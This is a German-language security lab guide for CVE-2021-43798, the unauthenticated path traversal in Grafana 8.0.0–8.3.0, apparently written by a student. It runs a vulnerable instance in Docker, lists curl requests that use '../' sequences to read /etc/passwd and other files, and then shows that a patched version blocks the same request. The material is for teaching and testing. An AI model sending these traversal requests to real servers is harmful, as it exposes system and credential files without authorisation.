
CVE-2021-43798 Grafana Unauthenticated Path Traversal - Security Lab | Shivam Gupta | 23104003
Nur für Bildungszwecke. Führen Sie dieses Labor nur auf einer isolierten lokalen Maschine aus. Setzen Sie es niemals dem Internet aus.
| Feld | Detail |
|---|---|
| CVE-ID | CVE-2021-43798 |
| Produkt | Grafana |
| Betroffene Versionen | 8.0.0 – 8.3.0 |
| Gepatchte Version | 8.3.1+ |
| Schweregrad | Hoch |
| CVSS v3.1 Score | 7.5 |
| CWE | CWE-22 — Path Traversal |
| Authentifizierung erforderlich | Keine |
| Angriffsvektor | Netzwerk |
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta
docker compose up -d
Überprüfen:
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"
Öffnen Sie http://127.0.0.1:3000 — Login: admin / admin
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"
Erwartet: Dateiinhalte werden mit HTTP 200 zurückgegeben — keine Authentifizierung erforderlich.
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health
Wenn der Hostname zurückgegeben wird → VERWUNDBAR. Version 8.0.0–8.3.0 → VERWUNDBAR.
Gepatchte Instanz starten (Grafana 8.3.1):
docker compose -f docker-compose.patched.yml up -d
Überprüfen, ob der Exploit blockiert wird:
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}
docker compose down
docker compose -f docker-compose.patched.yml down